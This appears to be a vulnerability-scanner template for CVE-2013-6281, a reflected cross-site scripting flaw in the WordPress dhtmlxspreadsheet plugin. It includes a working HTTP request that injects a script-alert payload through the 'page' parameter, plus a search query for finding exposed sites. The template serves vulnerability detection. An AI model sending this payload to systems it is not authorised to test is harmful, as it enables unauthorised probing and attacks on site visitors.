id: CVE-2013-6281 info: name: WordPress Spreadsheet - Cross-Site Scripting author: random-robbie severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. remediation: | Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - https://wordpress.org/plugins/dhtmlxspreadsheet/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 epss-percentile: 0.58605 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: dhtmlx product: dhtmlxspreadsheet framework: wordpress google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin http: - raw: - | GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "page: ''" - "dhx_rel_path" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100e23670dfdbacdf4a617f6ac17562f0022d897644cb8aabbaed65059668911a7302206a847ecc59f4642a6fdeda19768e712bec8ae4fb6347b44e8d58e2f1cae081cc:922c64590222798bb761d5b6d8e72950